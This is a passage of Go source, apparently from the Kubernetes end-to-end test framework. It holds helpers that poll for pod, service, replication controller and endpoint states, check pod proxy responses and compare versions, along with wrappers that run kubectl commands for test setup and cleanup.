return true, fmt.Errorf("Expected pod %v in namespace %v to be terminated with reason %v, got reason: %v", podName, namespace, reason, pod.Status.Reason)
}
}
return false, nil
})
}
// waitForPodSuccessInNamespaceTimeout returns nil if the pod reached state success, or an error if it reached failure or ran too long.
func waitForPodSuccessInNamespaceTimeout(c clientset.Interface, podName string, namespace string, timeout time.Duration) error {
return WaitForPodCondition(c, namespace, podName, "success or failure", timeout, func(pod *v1.Pod) (bool, error) {
if pod.Spec.RestartPolicy == v1.RestartPolicyAlways {
return true, fmt.Errorf("pod %q will never terminate with a succeeded state since its restart policy is Always", podName)
}
switch pod.Status.Phase {
case v1.PodSucceeded:
By("Saw pod success")
return true, nil
case v1.PodFailed:
return true, fmt.Errorf("pod %q failed with status: %+v", podName, pod.Status)
default:
return false, nil
}
})
}
// WaitForPodSuccessInNamespace returns nil if the pod reached state success, or an error if it reached failure or until podStartupTimeout.
func WaitForPodSuccessInNamespace(c clientset.Interface, podName string, namespace string) error {
return waitForPodSuccessInNamespaceTimeout(c, podName, namespace, PodStartTimeout)
}
// WaitForPodSuccessInNamespaceSlow returns nil if the pod reached state success, or an error if it reached failure or until slowPodStartupTimeout.
func WaitForPodSuccessInNamespaceSlow(c clientset.Interface, podName string, namespace string) error {
return waitForPodSuccessInNamespaceTimeout(c, podName, namespace, slowPodStartTimeout)
}
// WaitForRCToStabilize waits till the RC has a matching generation/replica count between spec and status.
func WaitForRCToStabilize(c clientset.Interface, ns, name string, timeout time.Duration) error {
options := metav1.ListOptions{FieldSelector: fields.Set{
"metadata.name": name,
"metadata.namespace": ns,
}.AsSelector().String()}
w, err := c.Core().ReplicationControllers(ns).Watch(options)
if err != nil {
return err
}
_, err = watch.Until(timeout, w, func(event watch.Event) (bool, error) {
switch event.Type {
case watch.Deleted:
return false, apierrs.NewNotFound(schema.GroupResource{Resource: "replicationcontrollers"}, "")
}
switch rc := event.Object.(type) {
case *v1.ReplicationController:
if rc.Name == name && rc.Namespace == ns &&
rc.Generation <= rc.Status.ObservedGeneration &&
*(rc.Spec.Replicas) == rc.Status.Replicas {
return true, nil
}
Logf("Waiting for rc %s to stabilize, generation %v observed generation %v spec.replicas %d status.replicas %d",
name, rc.Generation, rc.Status.ObservedGeneration, *(rc.Spec.Replicas), rc.Status.Replicas)
}
return false, nil
})
return err
}
func WaitForPodToDisappear(c clientset.Interface, ns, podName string, label labels.Selector, interval, timeout time.Duration) error {
return wait.PollImmediate(interval, timeout, func() (bool, error) {
Logf("Waiting for pod %s to disappear", podName)
options := metav1.ListOptions{LabelSelector: label.String()}
pods, err := c.Core().Pods(ns).List(options)
if err != nil {
return false, err
}
found := false
for _, pod := range pods.Items {
if pod.Name == podName {
Logf("Pod %s still exists", podName)
found = true
break
}
}
if !found {
Logf("Pod %s no longer exists", podName)
return true, nil
}
return false, nil
})
}
// WaitForRCPodToDisappear returns nil if the pod from the given replication controller (described by rcName) no longer exists.
// In case of failure or too long waiting time, an error is returned.
func WaitForRCPodToDisappear(c clientset.Interface, ns, rcName, podName string) error {
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": rcName}))
// NodeController evicts pod after 5 minutes, so we need timeout greater than that to observe effects.
// The grace period must be set to 0 on the pod for it to be deleted during the partition.
// Otherwise, it goes to the 'Terminating' state till the kubelet confirms deletion.
return WaitForPodToDisappear(c, ns, podName, label, 20*time.Second, 10*time.Minute)
}
// WaitForService waits until the service appears (exist == true), or disappears (exist == false)
func WaitForService(c clientset.Interface, namespace, name string, exist bool, interval, timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
_, err := c.Core().Services(namespace).Get(name, metav1.GetOptions{})
switch {
case err == nil:
Logf("Service %s in namespace %s found.", name, namespace)
return exist, nil
case apierrs.IsNotFound(err):
Logf("Service %s in namespace %s disappeared.", name, namespace)
return !exist, nil
default:
Logf("Get service %s in namespace %s failed: %v", name, namespace, err)
return false, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for service %s/%s %s: %v", namespace, name, stateMsg[exist], err)
}
return nil
}
// WaitForServiceWithSelector waits until any service with given selector appears (exist == true), or disappears (exist == false)
func WaitForServiceWithSelector(c clientset.Interface, namespace string, selector labels.Selector, exist bool, interval,
timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
services, err := c.Core().Services(namespace).List(metav1.ListOptions{LabelSelector: selector.String()})
switch {
case len(services.Items) != 0:
Logf("Service with %s in namespace %s found.", selector.String(), namespace)
return exist, nil
case len(services.Items) == 0:
Logf("Service with %s in namespace %s disappeared.", selector.String(), namespace)
return !exist, nil
default:
Logf("List service with %s in namespace %s failed: %v", selector.String(), namespace, err)
return false, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for service with %s in namespace %s %s: %v", selector.String(), namespace, stateMsg[exist], err)
}
return nil
}
//WaitForServiceEndpointsNum waits until the amount of endpoints that implement service to expectNum.
func WaitForServiceEndpointsNum(c clientset.Interface, namespace, serviceName string, expectNum int, interval, timeout time.Duration) error {
return wait.Poll(interval, timeout, func() (bool, error) {
Logf("Waiting for amount of service:%s endpoints to be %d", serviceName, expectNum)
list, err := c.Core().Endpoints(namespace).List(metav1.ListOptions{})
if err != nil {
return false, err
}
for _, e := range list.Items {
if e.Name == serviceName && countEndpointsNum(&e) == expectNum {
return true, nil
}
}
return false, nil
})
}
func countEndpointsNum(e *v1.Endpoints) int {
num := 0
for _, sub := range e.Subsets {
num += len(sub.Addresses)
}
return num
}
// WaitForReplicationController waits until the RC appears (exist == true), or disappears (exist == false)
func WaitForReplicationController(c clientset.Interface, namespace, name string, exist bool, interval, timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
_, err := c.Core().ReplicationControllers(namespace).Get(name, metav1.GetOptions{})
if err != nil {
Logf("Get ReplicationController %s in namespace %s failed (%v).", name, namespace, err)
return !exist, nil
} else {
Logf("ReplicationController %s in namespace %s found.", name, namespace)
return exist, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for ReplicationController %s/%s %s: %v", namespace, name, stateMsg[exist], err)
}
return nil
}
// WaitForReplicationControllerwithSelector waits until any RC with given selector appears (exist == true), or disappears (exist == false)
func WaitForReplicationControllerwithSelector(c clientset.Interface, namespace string, selector labels.Selector, exist bool, interval,
timeout time.Duration) error {
err := wait.PollImmediate(interval, timeout, func() (bool, error) {
rcs, err := c.Core().ReplicationControllers(namespace).List(metav1.ListOptions{LabelSelector: selector.String()})
switch {
case len(rcs.Items) != 0:
Logf("ReplicationController with %s in namespace %s found.", selector.String(), namespace)
return exist, nil
case len(rcs.Items) == 0:
Logf("ReplicationController with %s in namespace %s disappeared.", selector.String(), namespace)
return !exist, nil
default:
Logf("List ReplicationController with %s in namespace %s failed: %v", selector.String(), namespace, err)
return false, nil
}
})
if err != nil {
stateMsg := map[bool]string{true: "to appear", false: "to disappear"}
return fmt.Errorf("error waiting for ReplicationControllers with %s in namespace %s %s: %v", selector.String(), namespace, stateMsg[exist], err)
}
return nil
}
func WaitForEndpoint(c clientset.Interface, ns, name string) error {
for t := time.Now(); time.Since(t) < EndpointRegisterTimeout; time.Sleep(Poll) {
endpoint, err := c.Core().Endpoints(ns).Get(name, metav1.GetOptions{})
if apierrs.IsNotFound(err) {
Logf("Endpoint %s/%s is not ready yet", ns, name)
continue
}
Expect(err).NotTo(HaveOccurred())
if len(endpoint.Subsets) == 0 || len(endpoint.Subsets[0].Addresses) == 0 {
Logf("Endpoint %s/%s is not ready yet", ns, name)
continue
} else {
return nil
}
}
return fmt.Errorf("Failed to get endpoints for %s/%s", ns, name)
}
// Context for checking pods responses by issuing GETs to them (via the API
// proxy) and verifying that they answer with ther own pod name.
type podProxyResponseChecker struct {
c clientset.Interface
ns string
label labels.Selector
controllerName string
respondName bool // Whether the pod should respond with its own name.
pods *v1.PodList
}
func PodProxyResponseChecker(c clientset.Interface, ns string, label labels.Selector, controllerName string, respondName bool, pods *v1.PodList) podProxyResponseChecker {
return podProxyResponseChecker{c, ns, label, controllerName, respondName, pods}
}
// CheckAllResponses issues GETs to all pods in the context and verify they
// reply with their own pod name.
func (r podProxyResponseChecker) CheckAllResponses() (done bool, err error) {
successes := 0
options := metav1.ListOptions{LabelSelector: r.label.String()}
currentPods, err := r.c.Core().Pods(r.ns).List(options)
Expect(err).NotTo(HaveOccurred())
for i, pod := range r.pods.Items {
// Check that the replica list remains unchanged, otherwise we have problems.
if !isElementOf(pod.UID, currentPods) {
return false, fmt.Errorf("pod with UID %s is no longer a member of the replica set. Must have been restarted for some reason. Current replica set: %v", pod.UID, currentPods)
}
subResourceProxyAvailable, err := ServerVersionGTE(SubResourcePodProxyVersion, r.c.Discovery())
if err != nil {
return false, err
}
ctx, cancel := context.WithTimeout(context.Background(), SingleCallTimeout)
defer cancel()
var body []byte
if subResourceProxyAvailable {
body, err = r.c.Core().RESTClient().Get().
Context(ctx).
Namespace(r.ns).
Resource("pods").
SubResource("proxy").
Name(string(pod.Name)).
Do().
Raw()
} else {
body, err = r.c.Core().RESTClient().Get().
Context(ctx).
Prefix("proxy").
Namespace(r.ns).
Resource("pods").
Name(string(pod.Name)).
Do().
Raw()
}
if err != nil {
if ctx.Err() != nil {
// We may encounter errors here because of a race between the pod readiness and apiserver
// proxy. So, we log the error and retry if this occurs.
Logf("Controller %s: Failed to Get from replica %d [%s]: %v\n pod status: %#v", r.controllerName, i+1, pod.Name, err, pod.Status)
return false, nil
}
Logf("Controller %s: Failed to GET from replica %d [%s]: %v\npod status: %#v", r.controllerName, i+1, pod.Name, err, pod.Status)
continue
}
// The response checker expects the pod's name unless !respondName, in
// which case it just checks for a non-empty response.
got := string(body)
what := ""
if r.respondName {
what = "expected"
want := pod.Name
if got != want {
Logf("Controller %s: Replica %d [%s] expected response %q but got %q",
r.controllerName, i+1, pod.Name, want, got)
continue
}
} else {
what = "non-empty"
if len(got) == 0 {
Logf("Controller %s: Replica %d [%s] expected non-empty response",
r.controllerName, i+1, pod.Name)
continue
}
}
successes++
Logf("Controller %s: Got %s result from replica %d [%s]: %q, %d of %d required successes so far",
r.controllerName, what, i+1, pod.Name, got, successes, len(r.pods.Items))
}
if successes < len(r.pods.Items) {
return false, nil
}
return true, nil
}
// ServerVersionGTE returns true if v is greater than or equal to the server
// version.
//
// TODO(18726): This should be incorporated into client.VersionInterface.
func ServerVersionGTE(v *utilversion.Version, c discovery.ServerVersionInterface) (bool, error) {
serverVersion, err := c.ServerVersion()
if err != nil {
return false, fmt.Errorf("Unable to get server version: %v", err)
}
sv, err := utilversion.ParseSemantic(serverVersion.GitVersion)
if err != nil {
return false, fmt.Errorf("Unable to parse server version %q: %v", serverVersion.GitVersion, err)
}
return sv.AtLeast(v), nil
}
func SkipUnlessKubectlVersionGTE(v *utilversion.Version) {
gte, err := KubectlVersionGTE(v)
if err != nil {
Failf("Failed to get kubectl version: %v", err)
}
if !gte {
Skipf("Not supported for kubectl versions before %q", v)
}
}
// KubectlVersionGTE returns true if the kubectl version is greater than or
// equal to v.
func KubectlVersionGTE(v *utilversion.Version) (bool, error) {
kv, err := KubectlVersion()
if err != nil {
return false, err
}
return kv.AtLeast(v), nil
}
// KubectlVersion gets the version of kubectl that's currently being used (see
// --kubectl-path in e2e.go to use an alternate kubectl).
func KubectlVersion() (*utilversion.Version, error) {
output := RunKubectlOrDie("version", "--client")
matches := gitVersionRegexp.FindStringSubmatch(output)
if len(matches) != 2 {
return nil, fmt.Errorf("Could not find kubectl version in output %v", output)
}
// Don't use the full match, as it contains "GitVersion:\"" and a
// trailing "\"". Just use the submatch.
return utilversion.ParseSemantic(matches[1])
}
func PodsResponding(c clientset.Interface, ns, name string, wantName bool, pods *v1.PodList) error {
By("trying to dial each unique pod")
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": name}))
return wait.PollImmediate(Poll, podRespondingTimeout, PodProxyResponseChecker(c, ns, label, name, wantName, pods).CheckAllResponses)
}
func PodsCreated(c clientset.Interface, ns, name string, replicas int32) (*v1.PodList, error) {
label := labels.SelectorFromSet(labels.Set(map[string]string{"name": name}))
return PodsCreatedByLabel(c, ns, name, replicas, label)
}
func PodsCreatedByLabel(c clientset.Interface, ns, name string, replicas int32, label labels.Selector) (*v1.PodList, error) {
timeout := 2 * time.Minute
for start := time.Now(); time.Since(start) < timeout; time.Sleep(5 * time.Second) {
options := metav1.ListOptions{LabelSelector: label.String()}
// List the pods, making sure we observe all the replicas.
pods, err := c.Core().Pods(ns).List(options)
if err != nil {
return nil, err
}
created := []v1.Pod{}
for _, pod := range pods.Items {
if pod.DeletionTimestamp != nil {
continue
}
created = append(created, pod)
}
Logf("Pod name %s: Found %d pods out of %d", name, len(created), replicas)
if int32(len(created)) == replicas {
pods.Items = created
return pods, nil
}
}
return nil, fmt.Errorf("Pod name %s: Gave up waiting %v for %d pods to come up", name, timeout, replicas)
}
func podsRunning(c clientset.Interface, pods *v1.PodList) []error {
// Wait for the pods to enter the running state. Waiting loops until the pods
// are running so non-running pods cause a timeout for this test.
By("ensuring each pod is running")
e := []error{}
error_chan := make(chan error)
for _, pod := range pods.Items {
go func(p v1.Pod) {
error_chan <- WaitForPodRunningInNamespace(c, &p)
}(pod)
}
for range pods.Items {
err := <-error_chan
if err != nil {
e = append(e, err)
}
}
return e
}
func VerifyPods(c clientset.Interface, ns, name string, wantName bool, replicas int32) error {
return podRunningMaybeResponding(c, ns, name, wantName, replicas, true)
}
func VerifyPodsRunning(c clientset.Interface, ns, name string, wantName bool, replicas int32) error {
return podRunningMaybeResponding(c, ns, name, wantName, replicas, false)
}
func podRunningMaybeResponding(c clientset.Interface, ns, name string, wantName bool, replicas int32, checkResponding bool) error {
pods, err := PodsCreated(c, ns, name, replicas)
if err != nil {
return err
}
e := podsRunning(c, pods)
if len(e) > 0 {
return fmt.Errorf("failed to wait for pods running: %v", e)
}
if checkResponding {
err = PodsResponding(c, ns, name, wantName, pods)
if err != nil {
return fmt.Errorf("failed to wait for pods responding: %v", err)
}
}
return nil
}
func ServiceResponding(c clientset.Interface, ns, name string) error {
By(fmt.Sprintf("trying to dial the service %s.%s via the proxy", ns, name))
return wait.PollImmediate(Poll, ServiceRespondingTimeout, func() (done bool, err error) {
proxyRequest, errProxy := GetServicesProxyRequest(c, c.Core().RESTClient().Get())
if errProxy != nil {
Logf("Failed to get services proxy request: %v:", errProxy)
return false, nil
}
ctx, cancel := context.WithTimeout(context.Background(), SingleCallTimeout)
defer cancel()
body, err := proxyRequest.Namespace(ns).
Context(ctx).
Name(name).
Do().
Raw()
if err != nil {
if ctx.Err() != nil {
Failf("Failed to GET from service %s: %v", name, err)
return true, err
}
Logf("Failed to GET from service %s: %v:", name, err)
return false, nil
}
got := string(body)
if len(got) == 0 {
Logf("Service %s: expected non-empty response", name)
return false, err // stop polling
}
Logf("Service %s: found nonempty answer: %s", name, got)
return true, nil
})
}
func RestclientConfig(kubeContext string) (*clientcmdapi.Config, error) {
Logf(">>> kubeConfig: %s", TestContext.KubeConfig)
if TestContext.KubeConfig == "" {
return nil, fmt.Errorf("KubeConfig must be specified to load client config")
}
c, err := clientcmd.LoadFromFile(TestContext.KubeConfig)
if err != nil {
return nil, fmt.Errorf("error loading KubeConfig: %v", err.Error())
}
if kubeContext != "" {
Logf(">>> kubeContext: %s", kubeContext)
c.CurrentContext = kubeContext
}
return c, nil
}
type ClientConfigGetter func() (*restclient.Config, error)
func LoadConfig() (*restclient.Config, error) {
if TestContext.NodeE2E {
// This is a node e2e test, apply the node e2e configuration
return &restclient.Config{Host: TestContext.Host}, nil
}
c, err := RestclientConfig(TestContext.KubeContext)
if err != nil {
if TestContext.KubeConfig == "" {
return restclient.InClusterConfig()
} else {
return nil, err
}
}
return clientcmd.NewDefaultClientConfig(*c, &clientcmd.ConfigOverrides{ClusterInfo: clientcmdapi.Cluster{Server: TestContext.Host}}).ClientConfig()
}
func LoadInternalClientset() (*internalclientset.Clientset, error) {
config, err := LoadConfig()
if err != nil {
return nil, fmt.Errorf("error creating client: %v", err.Error())
}
return internalclientset.NewForConfig(config)
}
func LoadClientset() (*clientset.Clientset, error) {
config, err := LoadConfig()
if err != nil {
return nil, fmt.Errorf("error creating client: %v", err.Error())
}
return clientset.NewForConfig(config)
}
// randomSuffix provides a random string to append to pods,services,rcs.
// TODO: Allow service names to have the same form as names
// for pods and replication controllers so we don't
// need to use such a function and can instead
// use the UUID utility function.
func randomSuffix() string {
r := rand.New(rand.NewSource(time.Now().UnixNano()))
return strconv.Itoa(r.Int() % 10000)
}
func ExpectNoError(err error, explain ...interface{}) {
if err != nil {
Logf("Unexpected error occurred: %v", err)
}
ExpectWithOffset(1, err).NotTo(HaveOccurred(), explain...)
}
func ExpectNoErrorWithRetries(fn func() error, maxRetries int, explain ...interface{}) {
var err error
for i := 0; i < maxRetries; i++ {
err = fn()
if err == nil {
return
}
Logf("(Attempt %d of %d) Unexpected error occurred: %v", i+1, maxRetries, err)
}
ExpectWithOffset(1, err).NotTo(HaveOccurred(), explain...)
}
// Stops everything from filePath from namespace ns and checks if everything matching selectors from the given namespace is correctly stopped.
func Cleanup(filePath, ns string, selectors ...string) {
By("using delete to clean up resources")
var nsArg string
if ns != "" {
nsArg = fmt.Sprintf("--namespace=%s", ns)
}
RunKubectlOrDie("delete", "--grace-period=0", "-f", filePath, nsArg)
AssertCleanup(ns, selectors...)
}
// Asserts that cleanup of a namespace wrt selectors occurred.
func AssertCleanup(ns string, selectors ...string) {
var nsArg string
if ns != "" {
nsArg = fmt.Sprintf("--namespace=%s", ns)
}
for _, selector := range selectors {
resources := RunKubectlOrDie("get", "rc,svc", "-l", selector, "--no-headers", nsArg)
if resources != "" {
Failf("Resources left running after stop:\n%s", resources)
}
pods := RunKubectlOrDie("get", "pods", "-l", selector, nsArg, "-o", "go-template={{ range .items }}{{ if not .metadata.deletionTimestamp }}{{ .metadata.name }}{{ \"\\n\" }}{{ end }}{{ end }}")
if pods != "" {
Failf("Pods left unterminated after stop:\n%s", pods)
}
}
}
// validatorFn is the function which is individual tests will implement.
// we may want it to return more than just an error, at some point.
type validatorFn func(c clientset.Interface, podID string) error
// ValidateController is a generic mechanism for testing RC's that are running.
// It takes a container name, a test name, and a validator function which is plugged in by a specific test.
// "containername": this is grepped for.
// "containerImage" : this is the name of the image we expect to be launched. Not to confuse w/ images (kitten.jpg) which are validated.
// "testname": which gets bubbled up to the logging/failure messages if errors happen.
// "validator" function: This function is given a podID and a client, and it can do some specific validations that way.
func ValidateController(c clientset.Interface, containerImage string, replicas int, containername string, testname string, validator validatorFn, ns string) {
getPodsTemplate := "--template={{range.items}}{{.metadata.name}} {{end}}"
// NB: kubectl adds the "exists" function to the standard template functions.
// This lets us check to see if the "running" entry exists for each of the containers
// we care about. Exists will never return an error and it's safe to check a chain of
// things, any one of which may not exist. In the below template, all of info,
// containername, and running might be nil, so the normal index function isn't very
// helpful.
// This template is unit-tested in kubectl, so if you change it, update the unit test.
// You can read about the syntax here: http://golang.org/pkg/text/template/.
getContainerStateTemplate := fmt.Sprintf(`--template={{if (exists . "status" "containerStatuses")}}{{range .status.containerStatuses}}{{if (and (eq .name "%s") (exists . "state" "running"))}}true{{end}}{{end}}{{end}}`, containername)
getImageTemplate := fmt.Sprintf(`--template={{if (exists . "status" "containerStatuses")}}{{range .status.containerStatuses}}{{if eq .name "%s"}}{{.image}}{{end}}{{end}}{{end}}`, containername)
By(fmt.Sprintf("waiting for all containers in %s pods to come up.", testname)) //testname should be selector
waitLoop:
for start := time.Now(); time.Since(start) < PodStartTimeout; time.Sleep(5 * time.Second) {
getPodsOutput := RunKubectlOrDie("get", "pods", "-o", "template", getPodsTemplate, "-l", testname, fmt.Sprintf("--namespace=%v", ns))
pods := strings.Fields(getPodsOutput)
if numPods := len(pods); numPods != replicas {
By(fmt.Sprintf("Replicas for %s: expected=%d actual=%d", testname, replicas, numPods))
continue
}
var runningPods []string
for _, podID := range pods {
running := RunKubectlOrDie("get", "pods", podID, "-o", "template", getContainerStateTemplate, fmt.Sprintf("--namespace=%v", ns))
if running != "true" {
Logf("%s is created but not running", podID)
continue waitLoop
}
currentImage := RunKubectlOrDie("get", "pods", podID, "-o", "template", getImageTemplate, fmt.Sprintf("--namespace=%v", ns))
if currentImage != containerImage {
Logf("%s is created but running wrong image; expected: %s, actual: %s", podID, containerImage, currentImage)
continue waitLoop
}
// Call the generic validator function here.
// This might validate for example, that (1) getting a url works and (2) url is serving correct content.
if err := validator(c, podID); err != nil {
Logf("%s is running right image but validator function failed: %v", podID, err)
continue waitLoop
}
Logf("%s is verified up and running", podID)
runningPods = append(runningPods, podID)
}
// If we reach here, then all our checks passed.
if len(runningPods) == replicas {
return
}
}
// Reaching here means that one of more checks failed multiple times. Assuming its not a race condition, something is broken.
Failf("Timed out after %v seconds waiting for %s pods to reach valid state", PodStartTimeout.Seconds(), testname)
}
// KubectlCmd runs the kubectl executable through the wrapper script.
func KubectlCmd(args ...string) *exec.Cmd {
defaultArgs := []string{}
// Reference a --server option so tests can run anywhere.
if TestContext.Host != "" {
defaultArgs = append(defaultArgs, "--"+clientcmd.FlagAPIServer+"="+TestContext.Host)
}
if TestContext.KubeConfig != "" {
defaultArgs = append(defaultArgs, "--"+clientcmd.RecommendedConfigPathFlag+"="+TestContext.KubeConfig)
// Reference the KubeContext
if TestContext.KubeContext != "" {
defaultArgs = append(defaultArgs, "--"+clientcmd.FlagContext+"="+TestContext.KubeContext)
}
} else {
if TestContext.CertDir != "" {
defaultArgs = append(defaultArgs,
fmt.Sprintf("--certificate-authority=%s", filepath.Join(TestContext.CertDir, "ca.crt")),
fmt.Sprintf("--client-certificate=%s", filepath.Join(TestContext.CertDir, "kubecfg.crt")),
fmt.Sprintf("--client-key=%s", filepath.Join(TestContext.CertDir, "kubecfg.key")))
}
}
kubectlArgs := append(defaultArgs, args...)
//We allow users to specify path to kubectl, so you can test either "kubectl" or "cluster/kubectl.sh"
//and so on.
cmd := exec.Command(TestContext.KubectlPath, kubectlArgs...)
//caller will invoke this and wait on it.
return cmd
}
// kubectlBuilder is used to build, customize and execute a kubectl Command.
// Add more functions to customize the builder as needed.
type kubectlBuilder struct {
cmd *exec.Cmd
timeout <-chan time.Time
}
func NewKubectlCommand(args ...string) *kubectlBuilder {
b := new(kubectlBuilder)
b.cmd = KubectlCmd(args...)
return b
}
func (b *kubectlBuilder) WithEnv(env []string) *kubectlBuilder {
b.cmd.Env = env
return b
}
func (b *kubectlBuilder) WithTimeout(t <-chan time.Time) *kubectlBuilder {
b.timeout = t
return b
}
func (b kubectlBuilder) WithStdinData(data string) *kubectlBuilder {
b.cmd.Stdin = strings.NewReader(data)
return &b
}
func (b kubectlBuilder) WithStdinReader(reader io.Reader) *kubectlBuilder {
b.cmd.Stdin = reader
return &b
}
func (b kubectlBuilder) ExecOrDie() string {
str, err := b.Exec()
Logf("stdout: %q", str)
// In case of i/o timeout error, try talking to the apiserver again after 2s before dying.
// Note that we're still dying after retrying so that we can get visibility to triage it further.
if isTimeout(err) {
Logf("Hit i/o timeout error, talking to the server 2s later to see if it's temporary.")
time.Sleep(2 * time.Second)
retryStr, retryErr := RunKubectl("version")
Logf("stdout: %q", retryStr)
Logf("err: %v", retryErr)
}
Expect(err).NotTo(HaveOccurred())
return str
}
func isTimeout(err error) bool {
switch err := err.(type) {
case net.Error:
if err.Timeout() {
return true
}
case *url.Error:
if err, ok := err.Err.(net.Error); ok && err.Timeout() {
return true
}
}
return false
}
func (b kubectlBuilder) Exec() (string, error) {
var stdout, stderr bytes.Buffer
cmd := b.cmd
cmd.Stdout, cmd.Stderr = &stdout, &stderr
Logf("Running '%s %s'", cmd.Path, strings.Join(cmd.Args[1:], " ")) // skip arg[0] as it is printed separately
if err := cmd.Start(); err != nil {
return "", fmt.Errorf("error starting %v:\nCommand stdout:\n%v\nstderr:\n%v\nerror:\n%v\n", cmd, cmd.Stdout, cmd.Stderr, err)
}
errCh := make(chan error, 1)
go func() {
errCh <- cmd.Wait()
}()
select {
case err := <-errCh:
if err != nil {
var rc int = 127
if ee, ok := err.(*exec.ExitError); ok {
Logf("rc: %d", rc)
rc = int(ee.Sys().(syscall.WaitStatus).ExitStatus())
}
return "", uexec.CodeExitError{
Err: fmt.Errorf("error running %v:\nCommand stdout:\n%v\nstderr:\n%v\nerror:\n%v\n", cmd, cmd.Stdout, cmd.Stderr, err),
Code: rc,
}
}
case <-b.timeout:
b.cmd.Process.Kill()
return "", fmt.Errorf("timed out waiting for command %v:\nCommand stdout:\n%v\nstderr:\n%v\n", cmd, cmd.Stdout, cmd.Stderr)
}
Logf("stderr: %q", stderr.String())
return stdout.String(), nil
}
// RunKubectlOrDie is a convenience wrapper over kubectlBuilder
func RunKubectlOrDie(args ...string) string {
return NewKubectlCommand(args...).ExecOrDie()
}
// RunKubectl is a convenience wrapper over kubectlBuilder
func RunKubectl(args ...string) (string, error) {
return NewKubectlCommand(args...).Exec()
}
// RunKubectlOrDieInput is a convenience wrapper over kubectlBuilder that takes input to stdin
func RunKubectlOrDieInput(data string, args ...string) string {
return NewKubectlCommand(args...).WithStdinData(data).ExecOrDie()
}
func StartCmdAndStreamOutput(cmd *exec.Cmd) (stdout, stderr io.ReadCloser, err error) {
stdout, err = cmd.StdoutPipe()
if err != nil {
return
}
stderr, err = cmd.StderrPipe()
if err != nil {
return
}
Logf("Asynchronously running '%s %s'", cmd.Path, strings.Join(cmd.Args, " "))
err = cmd.Start()
return
}
// Rough equivalent of ctrl+c for cleaning up processes. Intended to be run in defer.
func TryKill(cmd *exec.Cmd) {
if err := cmd.Process.Kill(); err != nil {
Logf("ERROR failed to kill command %v! The process may leak", cmd)
}
}
// testContainerOutputMatcher runs the given pod in the given namespace and waits
// for all of the containers in the podSpec to move into the 'Success' status, and tests
// the specified container log against the given expected output using the given matcher.
func (f *Framework) testContainerOutputMatcher(scenarioName string,
pod *v1.Pod,
containerIndex int,
expectedOutput []string,
matcher func(string, ...interface{}) gomegatypes.GomegaMatcher) {
By(fmt.Sprintf("Creating a pod to test %v", scenarioName))
if containerIndex < 0 || containerIndex >= len(pod.Spec.Containers) {
Failf("Invalid container index: %d", containerIndex)
}
ExpectNoError(f.MatchContainerOutput(pod, pod.Spec.Containers[containerIndex].Name, expectedOutput, matcher))
}
// MatchContainerOutput creates a pod and waits for all it's containers to exit with success.
// It then tests that the matcher with each expectedOutput matches the output of the specified container.
func (f *Framework) MatchContainerOutput(
pod *v1.Pod,
containerName string,
expectedOutput []string,
matcher func(string, ...interface{}) gomegatypes.GomegaMatcher) error {
ns := pod.ObjectMeta.Namespace
if ns == "" {
ns = f.Namespace.Name
}
podClient := f.PodClientNS(ns)
createdPod := podClient.Create(pod)
defer func() {
By("delete the pod")
podClient.DeleteSync(createdPod.Name, &metav1.DeleteOptions{}, DefaultPodDeletionTimeout)
}()
// Wait for client pod to complete.
podErr := WaitForPodSuccessInNamespace(f.ClientSet, createdPod.Name, ns)
// Grab its logs. Get host first.
podStatus, err := podClient.Get(createdPod.Name, metav1.GetOptions{})
if err != nil {
return fmt.Errorf("failed to get pod status: %v", err)
}
if podErr != nil {
// Pod failed. Dump all logs from all containers to see what's wrong
for _, container := range podStatus.Spec.Containers {
logs, err := GetPodLogs(f.ClientSet, ns, podStatus.Name, container.Name)
if err != nil {
Logf("Failed to get logs from node %q pod %q container %q: %v",
podStatus.Spec.NodeName, podStatus.Name, container.Name, err)
continue
}
Logf("Output of node %q pod %q container %q: %s", podStatus.Spec.NodeName, podStatus.Name, container.Name, logs)
}
return fmt.Errorf("expected pod %q success: %v", createdPod.Name, podErr)
}
Logf("Trying to get logs from node %s pod %s container %s: %v",
podStatus.Spec.NodeName, podStatus.Name, containerName, err)
// Sometimes the actual containers take a second to get started, try to get logs for 60s
logs, err := GetPodLogs(f.ClientSet, ns, podStatus.Name, containerName)
if err != nil {
Logf("Failed to get logs from node %q pod %q container %q. %v",
podStatus.Spec.NodeName, podStatus.Name, containerName, err)
return fmt.Errorf("failed to get logs from %s for %s: %v", podStatus.Name, containerName, err)
}
for _, expected := range expectedOutput {
m := matcher(expected)
matches, err := m.Match(logs)
if err != nil {
return fmt.Errorf("expected %q in container output: %v", expected, err)
} else if !matches {
return fmt.Errorf("expected %q in container output: %s", expected, m.FailureMessage(logs))
}
}
return nil
}
func RunDeployment(config testutils.DeploymentConfig) error {
By(fmt.Sprintf("creating deployment %s in namespace %s", config.Name, config.Namespace))
config.NodeDumpFunc = DumpNodeDebugInfo
config.ContainerDumpFunc = LogFailedContainers
return testutils.RunDeployment(config)
}
func RunReplicaSet(config testutils.ReplicaSetConfig) error {
By(fmt.Sprintf("creating replicaset %s in namespace %s", config.Name, config.Namespace))
config.NodeDumpFunc = DumpNodeDebugInfo
config.ContainerDumpFunc = LogFailedContainers
return testutils.RunReplicaSet(config)
}
func RunRC(config testutils.RCConfig) error {
By(fmt.Sprintf("creating replication controller %s in namespace %s", config.Name, config.Namespace))
config.NodeDumpFunc = DumpNodeDebugInfo
config.ContainerDumpFunc = LogFailedContainers
return testutils.RunRC(config)
}
type EventsLister func(opts metav1.ListOptions, ns string) (*v1.EventList, error)
func DumpEventsInNamespace(eventsLister EventsLister, namespace string) {
By(fmt.Sprintf("Collecting events from namespace %q.", namespace))
events, err := eventsLister(metav1.ListOptions{}, namespace)
Expect(err).NotTo(HaveOccurred())
By(fmt.Sprintf("Found %d events.", len(events.Items)))
// Sort events by their first timestamp
sortedEvents := events.Items
if len(sortedEvents) > 1 {
sort.Sort(byFirstTimestamp(sortedEvents))
}
for _, e := range sortedEvents {
